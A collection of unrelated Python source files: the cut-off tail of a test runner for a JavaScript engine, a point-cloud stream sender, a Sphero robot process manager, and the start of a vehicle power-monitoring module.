if self.output.timed_out: return False return self.output.exit_code < 0 and \ self.output.exit_code != -signal.SIGABRT def HasTimedOut(self): return self.output.timed_out def HasFailed(self): execution_failed = self.test.DidFail(self.output) if self.test.IsNegative(): return not execution_failed else: return execution_failed def KillProcessWithID(pid): if utils.IsWindows(): os.popen('taskkill /T /F /PID %d' % pid) else: os.kill(pid, signal.SIGTERM) MAX_SLEEP_TIME = 0.1 INITIAL_SLEEP_TIME = 0.0001 SLEEP_TIME_FACTOR = 1.25 SEM_INVALID_VALUE = -1 SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h def Win32SetErrorMode(mode): prev_error_mode = SEM_INVALID_VALUE try: import ctypes prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode) except ImportError: pass return prev_error_mode def RunProcess(context, timeout, args, **rest): if context.verbose: print "#", " ".join(args) popen_args = args prev_error_mode = SEM_INVALID_VALUE if utils.IsWindows(): popen_args = '"' + subprocess.list2cmdline(args) + '"' if context.suppress_dialogs: # Try to change the error mode to avoid dialogs on fatal errors. Don't # touch any existing error mode flags by merging the existing error mode. # See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx. error_mode = SEM_NOGPFAULTERRORBOX prev_error_mode = Win32SetErrorMode(error_mode) Win32SetErrorMode(error_mode | prev_error_mode) process = subprocess.Popen( shell = utils.IsWindows(), args = popen_args, **rest ) if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE: Win32SetErrorMode(prev_error_mode) # Compute the end time - if the process crosses this limit we # consider it timed out. if timeout is None: end_time = None else: end_time = time.time() + timeout timed_out = False # Repeatedly check the exit code from the process in a # loop and keep track of whether or not it times out. exit_code = None sleep_time = INITIAL_SLEEP_TIME while exit_code is None: if (not end_time is None) and (time.time() >= end_time): # Kill the process and wait for it to exit. KillProcessWithID(process.pid) exit_code = process.wait() timed_out = True else: exit_code = process.poll() time.sleep(sleep_time) sleep_time = sleep_time * SLEEP_TIME_FACTOR if sleep_time > MAX_SLEEP_TIME: sleep_time = MAX_SLEEP_TIME return (process, exit_code, timed_out) def PrintError(str): sys.stderr.write(str) sys.stderr.write('\n') def CheckedUnlink(name): # On Windows, when run with -jN in parallel processes, # OS often fails to unlink the temp file. Not sure why. # Need to retry. # Idea from https://bugs.webkit.org/attachment.cgi?id=75982&action=prettypatch retry_count = 0 while retry_count < 30: try: os.unlink(name) return except OSError, e: retry_count += 1 time.sleep(retry_count * 0.1) PrintError("os.unlink() " + str(e)) def Execute(args, context, timeout=None): (fd_out, outname) = tempfile.mkstemp() (fd_err, errname) = tempfile.mkstemp() (process, exit_code, timed_out) = RunProcess( context, timeout, args = args, stdout = fd_out, stderr = fd_err, ) os.close(fd_out) os.close(fd_err) output = file(outname).read() errors = file(errname).read() CheckedUnlink(outname) CheckedUnlink(errname) return CommandOutput(exit_code, timed_out, output, errors) def ExecuteNoCapture(args, context, timeout=None): (process, exit_code, timed_out) = RunProcess( context, timeout, args = args, ) return CommandOutput(exit_code, False, "", "") def CarCdr(path): if len(path) == 0: return (None, [ ]) else: return (path[0], path[1:]) # Use this to run several variants of the tests, e.g.: # VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']] VARIANT_FLAGS = [[], ['--stress-opt', '--always-opt'], ['--nocrankshaft']] class TestConfiguration(object): def __init__(self, context, root): self.context = context self.root = root def Contains(self, path, file): if len(path) > len(file): return False for i in xrange(len(path)): if not path[i].match(file[i]): return False return True def GetTestStatus(self, sections, defs): pass def VariantFlags(self): return VARIANT_FLAGS class TestSuite(object): def __init__(self, name): self.name = name def GetName(self): return self.name class TestRepository(TestSuite): def __init__(self, path): normalized_path = abspath(path) super(TestRepository, self).__init__(basename(normalized_path)) self.path = normalized_path self.is_loaded = False self.config = None def GetConfiguration(self, context): if self.is_loaded: return self.config self.is_loaded = True file = None try: (file, pathname, description) = imp.find_module('testcfg', [ self.path ]) module = imp.load_module('testcfg', file, pathname, description) self.config = module.GetConfiguration(context, self.path) finally: if file: file.close() return self.config def GetBuildRequirements(self, path, context): return self.GetConfiguration(context).GetBuildRequirements() def DownloadData(self, context): config = self.GetConfiguration(context) if 'DownloadData' in dir(config): config.DownloadData() def AddTestsToList(self, result, current_path, path, context, mode): config = self.GetConfiguration(context) for v in config.VariantFlags(): tests = config.ListTests(current_path, path, mode, v) for t in tests: t.variant_flags = v result += tests def GetTestStatus(self, context, sections, defs): self.GetConfiguration(context).GetTestStatus(sections, defs) class LiteralTestSuite(TestSuite): def __init__(self, tests): super(LiteralTestSuite, self).__init__('root') self.tests = tests def GetBuildRequirements(self, path, context): (name, rest) = CarCdr(path) result = [ ] for test in self.tests: if not name or name.match(test.GetName()): result += test.GetBuildRequirements(rest, context) return result def DownloadData(self, path, context): (name, rest) = CarCdr(path) for test in self.tests: if not name or name.match(test.GetName()): test.DownloadData(context) def ListTests(self, current_path, path, context, mode, variant_flags): (name, rest) = CarCdr(path) result = [ ] for test in self.tests: test_name = test.GetName() if not name or name.match(test_name): full_path = current_path + [test_name] test.AddTestsToList(result, full_path, path, context, mode) return result def GetTestStatus(self, context, sections, defs): for test in self.tests: test.GetTestStatus(context, sections, defs) SUFFIX = { 'debug' : '_g', 'release' : '' } FLAGS = { 'debug' : ['--enable-slow-asserts', '--debug-code', '--verify-heap'], 'release' : []} TIMEOUT_SCALEFACTOR = { 'debug' : 4, 'release' : 1 } class Context(object): def __init__(self, workspace, buildspace, verbose, vm, timeout, processor, suppress_dialogs, store_unexpected_output): self.workspace = workspace self.buildspace = buildspace self.verbose = verbose self.vm_root = vm self.timeout = timeout self.processor = processor self.suppress_dialogs = suppress_dialogs self.store_unexpected_output = store_unexpected_output def GetVm(self, mode): name = self.vm_root + SUFFIX[mode] if utils.IsWindows() and not name.endswith('.exe'): name = name + '.exe' return name def GetVmCommand(self, testcase, mode): return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode) def GetVmFlags(self, testcase, mode): flags = testcase.GetCustomFlags(mode) if flags is None: flags = FLAGS[mode] return testcase.variant_flags + flags def GetTimeout(self, testcase, mode): result = self.timeout * TIMEOUT_SCALEFACTOR[mode] if '--stress-opt' in self.GetVmFlags(testcase, mode): return result * 4 else: return result def RunTestCases(cases_to_run, progress, tasks): progress = PROGRESS_INDICATORS[progress](cases_to_run) result = 0 try: result = progress.Run(tasks) except Exception, e: print "\n", e return result def BuildRequirements(context, requirements, mode, scons_flags): command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)] + requirements + scons_flags) output = ExecuteNoCapture(command_line, context) return output.exit_code == 0 # ------------------------------------------- # --- T e s t C o n f i g u r a t i o n --- # ------------------------------------------- SKIP = 'skip' FAIL = 'fail' PASS = 'pass' OKAY = 'okay' TIMEOUT = 'timeout' CRASH = 'crash' SLOW = 'slow' class Expression(object): pass class Constant(Expression): def __init__(self, value): self.value = value def Evaluate(self, env, defs): return self.value class Variable(Expression): def __init__(self, name): self.name = name def GetOutcomes(self, env, defs): if self.name in env: return ListSet([env[self.name]]) else: return Nothing() def Evaluate(self, env, defs): return env[self.name] class Outcome(Expression): def __init__(self, name): self.name = name def GetOutcomes(self, env, defs): if self.name in defs: return defs[self.name].GetOutcomes(env, defs) else: return ListSet([self.name]) class Set(object): pass class ListSet(Set): def __init__(self, elms): self.elms = elms def __str__(self): return "ListSet%s" % str(self.elms) def Intersect(self, that): if not isinstance(that, ListSet): return that.Intersect(self) return ListSet([ x for x in self.elms if x in that.elms ]) def Union(self, that): if not isinstance(that, ListSet): return that.Union(self) return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ]) def IsEmpty(self): return len(self.elms) == 0 class Everything(Set): def Intersect(self, that): return that def Union(self, that): return self def IsEmpty(self): return False class Nothing(Set): def Intersect(self, that): return self def Union(self, that): return that def IsEmpty(self): return True class Operation(Expression): def __init__(self, left, op, right): self.left = left self.op = op self.right = right def Evaluate(self, env, defs): if self.op == '||' or self.op == ',': return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs) elif self.op == 'if': return False elif self.op == '==': inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs)) return not inter.IsEmpty() elif self.op == '!=': inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs)) return inter.IsEmpty() else: assert self.op == '&&' return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs) def GetOutcomes(self, env, defs): if self.op == '||' or self.op == ',': return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs)) elif self.op == 'if': if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs) else: return Nothing() else: assert self.op == '&&' return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs)) def IsAlpha(str): for char in str: if not (char.isalpha() or char.isdigit() or char == '_'): return False return True class Tokenizer(object): """A simple string tokenizer that chops expressions into variables, parens and operators""" def __init__(self, expr): self.index = 0 self.expr = expr self.length = len(expr) self.tokens = None def Current(self, length = 1): if not self.HasMore(length): return "" return self.expr[self.index:self.index+length] def HasMore(self, length = 1): return self.index < self.length + (length - 1) def Advance(self, count = 1): self.index = self.index + count def AddToken(self, token): self.tokens.append(token) def SkipSpaces(self): while self.HasMore() and self.Current().isspace(): self.Advance() def Tokenize(self): self.tokens = [ ] while self.HasMore(): self.SkipSpaces() if not self.HasMore(): return None if self.Current() == '(': self.AddToken('(') self.Advance() elif self.Current() == ')': self.AddToken(')') self.Advance() elif self.Current() == '$': self.AddToken('$') self.Advance() elif self.Current() == ',': self.AddToken(',') self.Advance() elif IsAlpha(self.Current()): buf = "" while self.HasMore() and IsAlpha(self.Current()): buf += self.Current() self.Advance() self.AddToken(buf) elif self.Current(2) == '&&': self.AddToken('&&') self.Advance(2) elif self.Current(2) == '||': self.AddToken('||') self.Advance(2) elif self.Current(2) == '==': self.AddToken('==') self.Advance(2) elif self.Current(2) == '!=': self.AddToken('!=') self.Advance(2) else: return None return self.tokens class Scanner(object): """A simple scanner that can serve out tokens from a given list""" def __init__(self, tokens): self.tokens = tokens self.length = len(tokens) self.index = 0 def HasMore(self): return self.index < self.length def Current(self): return self.tokens[self.index] def Advance(self): self.index = self.index + 1 def ParseAtomicExpression(scan): if scan.Current() == "true": scan.Advance() return Constant(True) elif scan.Current() == "false": scan.Advance() return Constant(False) elif IsAlpha(scan.Current()): name = scan.Current() scan.Advance() return Outcome(name.lower()) elif scan.Current() == '$': scan.Advance() if not IsAlpha(scan.Current()): return None name = scan.Current() scan.Advance() return Variable(name.lower()) elif scan.Current() == '(': scan.Advance() result = ParseLogicalExpression(scan) if (not result) or (scan.Current() != ')'): return None scan.Advance() return result else: return None BINARIES = ['==', '!='] def ParseOperatorExpression(scan): left = ParseAtomicExpression(scan) if not left: return None while scan.HasMore() and (scan.Current() in BINARIES): op = scan.Current() scan.Advance() right = ParseOperatorExpression(scan) if not right: return None left = Operation(left, op, right) return left def ParseConditionalExpression(scan): left = ParseOperatorExpression(scan) if not left: return None while scan.HasMore() and (scan.Current() == 'if'): scan.Advance() right = ParseOperatorExpression(scan) if not right: return None left = Operation(left, 'if', right) return left LOGICALS = ["&&", "||", ","] def ParseLogicalExpression(scan): left = ParseConditionalExpression(scan) if not left: return None while scan.HasMore() and (scan.Current() in LOGICALS): op = scan.Current() scan.Advance() right = ParseConditionalExpression(scan) if not right: return None left = Operation(left, op, right) return left def ParseCondition(expr): """Parses a logical expression into an Expression object""" tokens = Tokenizer(expr).Tokenize() if not tokens: print "Malformed expression: '%s'" % expr return None scan = Scanner(tokens) ast = ParseLogicalExpression(scan) if not ast: print "Malformed expression: '%s'" % expr return None if scan.HasMore(): print "Malformed expression: '%s'" % expr return None return ast class ClassifiedTest(object): def __init__(self, case, outcomes): self.case = case self.outcomes = outcomes def TestsIsolates(self): return self.case.TestsIsolates() class Configuration(object): """The parsed contents of a configuration file""" def __init__(self, sections, defs): self.sections = sections self.defs = defs def ClassifyTests(self, cases, env): sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)] all_rules = reduce(list.__add__, [s.rules for s in sections], []) unused_rules = set(all_rules) result = [ ] all_outcomes = set([]) for case in cases: matches = [ r for r in all_rules if r.Contains(case.path) ] outcomes = set([]) for rule in matches: outcomes = outcomes.union(rule.GetOutcomes(env, self.defs)) unused_rules.discard(rule) if not outcomes: outcomes = [PASS] case.outcomes = outcomes all_outcomes = all_outcomes.union(outcomes) result.append(ClassifiedTest(case, outcomes)) return (result, list(unused_rules), all_outcomes) class Section(object): """A section of the configuration file. Sections are enabled or disabled prior to running the tests, based on their conditions""" def __init__(self, condition): self.condition = condition self.rules = [ ] def AddRule(self, rule): self.rules.append(rule) class Rule(object): """A single rule that specifies the expected outcome for a single test.""" def __init__(self, raw_path, path, value): self.raw_path = raw_path self.path = path self.value = value def GetOutcomes(self, env, defs): set = self.value.GetOutcomes(env, defs) assert isinstance(set, ListSet) return set.elms def Contains(self, path): if len(self.path) > len(path): return False for i in xrange(len(self.path)): if not self.path[i].match(path[i]): return False return True HEADER_PATTERN = re.compile(r'\[([^]]+)\]') RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)') DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$') PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$') def ReadConfigurationInto(path, sections, defs): current_section = Section(Constant(True)) sections.append(current_section) prefix = [] for line in utils.ReadLinesFrom(path): header_match = HEADER_PATTERN.match(line) if header_match: condition_str = header_match.group(1).strip() condition = ParseCondition(condition_str) new_section = Section(condition) sections.append(new_section) current_section = new_section continue rule_match = RULE_PATTERN.match(line) if rule_match: path = prefix + SplitPath(rule_match.group(1).strip()) value_str = rule_match.group(2).strip() value = ParseCondition(value_str) if not value: return False current_section.AddRule(Rule(rule_match.group(1), path, value)) continue def_match = DEF_PATTERN.match(line) if def_match: name = def_match.group(1).lower() value = ParseCondition(def_match.group(2).strip()) if not value: return False defs[name] = value continue prefix_match = PREFIX_PATTERN.match(line) if prefix_match: prefix = SplitPath(prefix_match.group(1).strip()) continue print "Malformed line: '%s'." % line return False return True # --------------- # --- M a i n --- # --------------- ARCH_GUESS = utils.GuessArchitecture() TIMEOUT_DEFAULT = 60; def BuildOptions(): result = optparse.OptionParser() result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)", default='release') result.add_option("-v", "--verbose", help="Verbose output", default=False, action="store_true") result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons", default=[], action="append") result.add_option("-p", "--progress", help="The style of progress indicator (verbose, dots, color, mono)", choices=PROGRESS_INDICATORS.keys(), default="mono") result.add_option("--no-build", help="Don't build requirements", default=False, action="store_true") result.add_option("--build-only", help="Only build requirements, don't run the tests", default=False, action="store_true") result.add_option("--build-system", help="Build system in use (scons or gyp)", default='scons') result.add_option("--report", help="Print a summary of the tests to be run", default=False, action="store_true") result.add_option("--download-data", help="Download missing test suite data", default=False, action="store_true") result.add_option("-s", "--suite", help="A test suite", default=[], action="append") result.add_option("-t", "--timeout", help="Timeout in seconds", default=-1, type="int") result.add_option("--arch", help='The architecture to run tests for', default='none') result.add_option("--snapshot", help="Run the tests with snapshot turned on", default=False, action="store_true") result.add_option("--simulator", help="Run tests with architecture simulator", default='none') result.add_option("--special-command", default=None) result.add_option("--valgrind", help="Run tests through valgrind", default=False, action="store_true") result.add_option("--cat", help="Print the source of the tests", default=False, action="store_true") result.add_option("--warn-unused", help="Report unused rules", default=False, action="store_true") result.add_option("-j", help="The number of parallel tasks to run", default=1, type="int") result.add_option("--time", help="Print timing information after running", default=False, action="store_true") result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests", dest="suppress_dialogs", default=True, action="store_true") result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests", dest="suppress_dialogs", action="store_false") result.add_option("--mips-arch-variant", help="mips architecture variant: mips32r1/mips32r2", default="mips32r2"); result.add_option("--shell", help="Path to V8 shell", default="d8") result.add_option("--isolates", help="Whether to test isolates", default=False, action="store_true") result.add_option("--store-unexpected-output", help="Store the temporary JS files from tests that fails", dest="store_unexpected_output", default=True, action="store_true") result.add_option("--no-store-unexpected-output", help="Deletes the temporary JS files from tests that fails", dest="store_unexpected_output", action="store_false") result.add_option("--stress-only", help="Only run tests with --always-opt --stress-opt", default=False, action="store_true") result.add_option("--nostress", help="Don't run crankshaft --always-opt --stress-op test", default=False, action="store_true") result.add_option("--crankshaft", help="Run with the --crankshaft flag", default=False, action="store_true") result.add_option("--shard-count", help="Split testsuites into this number of shards", default=1, type="int") result.add_option("--shard-run", help="Run this shard from the split up tests.", default=1, type="int") result.add_option("--noprof", help="Disable profiling support", default=False) return result def ProcessOptions(options): global VERBOSE VERBOSE = options.verbose options.mode = options.mode.split(',') for mode in options.mode: if not mode in ['debug', 'release']: print "Unknown mode %s" % mode return False if options.simulator != 'none': # Simulator argument was set. Make sure arch and simulator agree. if options.simulator != options.arch: if options.arch == 'none': options.arch = options.simulator else: print "Architecture %s does not match sim %s" %(options.arch, options.simulator) return False # Ensure that the simulator argument is handed down to scons. options.scons_flags.append("simulator=" + options.simulator) else: # If options.arch is not set by the command line and no simulator setting # was found, set the arch to the guess. if options.arch == 'none': options.arch = ARCH_GUESS options.scons_flags.append("arch=" + options.arch) # Simulators are slow, therefore allow a longer default timeout. if options.timeout == -1: if options.arch == 'arm' or options.arch == 'mips': options.timeout = 2 * TIMEOUT_DEFAULT; else: options.timeout = TIMEOUT_DEFAULT; if options.snapshot: options.scons_flags.append("snapshot=on") global VARIANT_FLAGS if options.mips_arch_variant: options.scons_flags.append("mips_arch_variant=" + options.mips_arch_variant) if options.stress_only: VARIANT_FLAGS = [['--stress-opt', '--always-opt']] if options.nostress: VARIANT_FLAGS = [[],['--nocrankshaft']] if options.crankshaft: if options.special_command: options.special_command += " --crankshaft" else: options.special_command = "@ --crankshaft" if options.shell.endswith("d8"): if options.special_command: options.special_command += " --test" else: options.special_command = "@ --test" if options.noprof: options.scons_flags.append("prof=off") options.scons_flags.append("profilingsupport=off") if options.build_system == 'gyp': if options.build_only: print "--build-only not supported for gyp, please build manually." options.build_only = False return True def DoSkip(case): return (SKIP in case.outcomes) or (SLOW in case.outcomes) REPORT_TEMPLATE = """\ Total: %(total)i tests * %(skipped)4d tests will be skipped * %(timeout)4d tests are expected to timeout sometimes * %(nocrash)4d tests are expected to be flaky but not crash * %(pass)4d tests are expected to pass * %(fail_ok)4d tests are expected to fail that we won't fix * %(fail)4d tests are expected to fail that we should fix\ """ def PrintReport(cases): def IsFlaky(o): return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o) def IsFailOk(o): return (len(o) == 2) and (FAIL in o) and (OKAY in o) unskipped = [c for c in cases if not DoSkip(c)] print REPORT_TEMPLATE % { 'total': len(cases), 'skipped': len(cases) - len(unskipped), 'timeout': len([t for t in unskipped if TIMEOUT in t.outcomes]), 'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]), 'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]), 'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]), 'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]]) } class Pattern(object): def __init__(self, pattern): self.pattern = pattern self.compiled = None def match(self, str): if not self.compiled: pattern = "^" + self.pattern.replace('*', '.*') + "$" self.compiled = re.compile(pattern) return self.compiled.match(str) def __str__(self): return self.pattern def SplitPath(s): stripped = [ c.strip() for c in s.split('/') ] return [ Pattern(s) for s in stripped if len(s) > 0 ] def GetSpecialCommandProcessor(value): if (not value) or (value.find('@') == -1): def ExpandCommand(args): return args return ExpandCommand else: pos = value.find('@') import urllib prefix = urllib.unquote(value[:pos]).split() suffix = urllib.unquote(value[pos+1:]).split() def ExpandCommand(args): return prefix + args + suffix return ExpandCommand BUILT_IN_TESTS = ['mjsunit', 'cctest', 'message', 'preparser'] def GetSuites(test_root): def IsSuite(path): return isdir(path) and exists(join(path, 'testcfg.py')) return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ] def FormatTime(d): millis = round(d * 1000) % 1000 return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis) def ShardTests(tests, options): if options.shard_count < 2: return tests if options.shard_run < 1 or options.shard_run > options.shard_count: print "shard-run not a valid number, should be in [1:shard-count]" print "defaulting back to running all tests" return tests count = 0 shard = [] for test in tests: if count % options.shard_count == options.shard_run - 1: shard.append(test) count += 1 return shard def Main(): parser = BuildOptions() (options, args) = parser.parse_args() if not ProcessOptions(options): parser.print_help() return 1 workspace = abspath(join(dirname(sys.argv[0]), '..')) suites = GetSuites(join(workspace, 'test')) repositories = [TestRepository(join(workspace, 'test', name)) for name in suites] repositories += [TestRepository(a) for a in options.suite] root = LiteralTestSuite(repositories) if len(args) == 0: paths = [SplitPath(t) for t in BUILT_IN_TESTS] else: paths = [ ] for arg in args: path = SplitPath(arg) paths.append(path) # Check for --valgrind option. If enabled, we overwrite the special # command flag with a command that uses the run-valgrind.py script. if options.valgrind: run_valgrind = join(workspace, "tools", "run-valgrind.py") options.special_command = "python -u " + run_valgrind + " @" if options.build_system == 'gyp': SUFFIX['debug'] = '' shell = abspath(options.shell) buildspace = dirname(shell) context = Context(workspace, buildspace, VERBOSE, shell, options.timeout, GetSpecialCommandProcessor(options.special_command), options.suppress_dialogs, options.store_unexpected_output) # First build the required targets if not options.no_build: reqs = [ ] for path in paths: reqs += root.GetBuildRequirements(path, context) reqs = list(set(reqs)) if len(reqs) > 0: if options.j != 1: options.scons_flags += ['-j', str(options.j)] if not BuildRequirements(context, reqs, options.mode, options.scons_flags): return 1 # Just return if we are only building the targets for running the tests. if options.build_only: return 0 # Get status for tests sections = [ ] defs = { } root.GetTestStatus(context, sections, defs) config = Configuration(sections, defs) # Download missing test suite data if requested. if options.download_data: for path in paths: root.DownloadData(path, context) # List the tests all_cases = [ ] all_unused = [ ] unclassified_tests = [ ] globally_unused_rules = None for path in paths: for mode in options.mode: env = { 'mode': mode, 'system': utils.GuessOS(), 'arch': options.arch, 'simulator': options.simulator, 'crankshaft': options.crankshaft, 'isolates': options.isolates } test_list = root.ListTests([], path, context, mode, []) unclassified_tests += test_list (cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env) if globally_unused_rules is None: globally_unused_rules = set(unused_rules) else: globally_unused_rules = globally_unused_rules.intersection(unused_rules) all_cases += ShardTests(cases, options) all_unused.append(unused_rules) if options.cat: visited = set() for test in unclassified_tests: key = tuple(test.path) if key in visited: continue visited.add(key) print "--- begin source: %s ---" % test.GetLabel() source = test.GetSource().strip() print source print "--- end source: %s ---" % test.GetLabel() return 0 if options.warn_unused: for rule in globally_unused_rules: print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path]) if not options.isolates: all_cases = [c for c in all_cases if not c.TestsIsolates()] if options.report: PrintReport(all_cases) result = None cases_to_run = [ c for c in all_cases if not DoSkip(c) ] if len(cases_to_run) == 0: print "No tests to run." return 0 else: try: start = time.time() if RunTestCases(cases_to_run, options.progress, options.j): result = 0 else: result = 1 duration = time.time() - start except KeyboardInterrupt: print "Interrupted" return 1 if options.time: # Write the times to stderr to make it easy to separate from the # test output. print sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration)) timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ] timed_tests.sort(lambda a, b: a.CompareTime(b)) index = 1 for entry in timed_tests[:20]: t = FormatTime(entry.duration) sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel())) index += 1 return result if __name__ == '__main__': sys.exit(Main())
cwipc_toproxy.py
import sys import os import time import threading import traceback import queue import socket import struct from .. import CWIPC_POINT_PACKETHEADER_MAGIC from ._scriptsupport import * class Sender: def __init__(self, host, port, verbose=False): self.producer = None self.queue = queue.Queue(maxsize=2) self.verbose = verbose self.socket = socket.socket() self.socket.connect((host, port)) def set_producer(self, producer): self.producer = producer def run(self): while self.producer and self.producer.is_alive(): try: pc = self.queue.get(timeout=0.033) ok = self.send_pc(pc) pc.free() except queue.Empty: pass def feed(self, pc): try: self.queue.put(pc, timeout=0.5) except queue.Full: pc.free() def send_pc(self, pc): data = pc.get_bytes() cellsize = pc.cellsize() timestamp = pc.timestamp() header = struct.pack("<iiqfi", CWIPC_POINT_PACKETHEADER_MAGIC, len(data), timestamp, cellsize, 0) x = self.socket.send(header) y = self.socket.send(data) def main(): SetupStackDumper() parser = ArgumentParser(description="Send pointcloud stream to cwipc_proxy") parser.add_argument("host", action="store", help="Hostname where cwipc_proxy server is running") parser.add_argument("port", type=int, action="store", help="Port where cwipc_proxy server is running") args = parser.parse_args() sourceFactory, _ = cwipc_genericsource_factory(args) source = sourceFactory() sender = Sender(args.host, args.port) sourceServer = SourceServer(source, sender, args) sourceThread = threading.Thread(target=sourceServer.run, args=()) if sender: sender.set_producer(sourceThread) # # Run everything # try: sourceThread.start() if sender: sender.run() sourceServer.stop() sourceThread.join() except KeyboardInterrupt: print("Interrupted.") sourceServer.stop() except: traceback.print_exc() # # It is safe to call join (or stop) multiple times, so we ensure to cleanup # sourceServer.stop() sourceThread.join() sourceServer.statistics() if __name__ == '__main__': main()
sphero_manager.py
from SpheroLib.sphero_bluetooth import run_sphero import multiprocessing as mp import time # from slackclient import SlackClient import subprocess class SpheroManager: def __init__(self, shared_resources): """ Spin up the sphero processes. Monitor them for good health. If they die, restart them. TODO: Alert State Machine """ shared_resources.get_numpy_resources() self.shared_resources = shared_resources self.process_data = {sphero_num: {"pid": None, "proc": None, "kill_switch": None, "reboot_status": None} for \ sphero_num in range(shared_resources.sphero_config["SIMULTANEOUS_SPHEROS"])} [self.start_sphero_process(sphero_num) for sphero_num in range(shared_resources.sphero_config["SIMULTANEOUS_SPHEROS"])] self.monitor_sphero_processes() def start_sphero_process(self, sphero_num): self.shared_resources.resources["logging_queue"].put_nowait( f"[Sphero Manager] Starting sphero {sphero_num} process.") kill_switch = mp.Value('i') kill_switch.value = 0 sphero_proc = mp.Process(target=run_sphero, args=(self.shared_resources, sphero_num, kill_switch)) # print (sphero_proc.daemon) sphero_proc.daemon = True sphero_proc.start() self.process_data[sphero_num]["pid"] = sphero_proc.pid self.process_data[sphero_num]["proc"] = sphero_proc self.process_data[sphero_num]["kill_switch"] = kill_switch self.process_data[sphero_num]["reboot_status"] = "ongoing" def monitor_sphero_processes(self): """ If a sphero process goes down, restart it. """ while True: time.sleep(.001) for sphero_num in self.process_data.keys(): if self.process_data[sphero_num]["kill_switch"].value == 2: # Low Battery if self.process_data[sphero_num]["reboot_status"] == "stopped": continue self.shared_resources.resources["logging_queue"].put_nowait( f"[Sphero Manager] sphero{sphero_num} is low on charge. Alerting slack.") self.process_data[sphero_num]["proc"].terminate() # slackclient = SlackClient(self.shared_resources.sphero_config["SLACKTOKEN"]) # slackclient.api_call("chat.postMessage", channel="sphero_slack", # text=f"Sphero {sphero_num} low battery. " # f"Volts= {self.shared_resources.resources['np_array_sphero_battery']}") self.process_data[sphero_num]["reboot_status"] = "stopped" elif self.process_data[sphero_num]["kill_switch"].value == 1: # Kill Switch self.shared_resources.resources["logging_queue"].put_nowait( f"[Sphero Manager] sphero{sphero_num} process has pulled kill switch") self.process_data[sphero_num]["proc"].terminate() while self.process_data[sphero_num]["proc"].exitcode is None: time.sleep(.01) self.process_data[sphero_num]["proc"].join() self.start_sphero_process(sphero_num) elif not self.process_data[sphero_num]["proc"].is_alive(): self.shared_resources.resources["logging_queue"].put_nowait( f"[Sphero Manager] sphero{sphero_num} process has died") self.process_data[sphero_num]["proc"].join() print(self.process_data[sphero_num]) time.sleep(30) self.start_sphero_process(sphero_num)
power_monitoring.py
import random import threading import time from statistics import mean from cereal import log from common.realtime import sec_since_boot from common.params import Params, put_nonblocking from common.hardware import TICI from selfdrive.swaglog import cloudlog CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1)) # A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars # While driving, a battery charges completely in about 30-60 minutes CAR_BATTERY_CAPACITY_uWh = 30e6 CAR_CHARGING_RATE_W = 45 VBATT_PAUSE_CHARGING = 11.0 MAX_TIME_OFFROAD_S = 30*3600 # Parameters def get_battery_capacity(): return _read_param("/sys/class/power_supply/battery/capacity", int) def get_battery_status(): # This does not correspond with actual charging or not. # If a USB cable is plugged in, it responds with 'Charging', even when charging is disabled return _read_param("/sys/class/power_supply/battery/status", lambda x: x.strip(), '') def get_battery_current(): return _read_param("/sys/class/power_supply/battery/current_now", int) def get_battery_voltage(): return _read_param("/sys/class/power_supply/battery/voltage_now", int) def get_usb_present(): return _read_param("/sys/class/power_supply/usb/present", lambda x: bool(int(x)), False) def get_battery_charging(): # This does correspond with actually charging return _read_param("/sys/class/power_supply/battery/charge_type", lambda x: x.strip() != "N/A", True) def set_battery_charging(on): with open('/sys/class/power_supply/battery/charging_enabled', 'w') as f: f.write(f"{1 if on else 0}\n") # Helpers def _read_param(path, parser, default=0): try: with open(path) as f: return parser(f.read()) except Exception: return default class PowerMonitoring: def __init__(self): self.params = Params() self.last_measurement_time = None # Used for integration delta self.last_save_time = 0 # Used for saving current value in a param self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad self.next_pulsed_measurement_time = None self.car_voltage_mV = 12e3 # Low-passed version of health voltage self.integration_lock = threading.Lock() self.ts_last_charging_ctrl = None car_battery_capacity_uWh = self.params.get("CarBatteryCapacity") if car_battery_capacity_uWh is None: car_battery_capacity_uWh = 0 # Reset capacity if it's low self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh)) # Calculation tick def calculate(self, health, msg): try: now = sec_since_boot() # If health is None, we're probably not in a 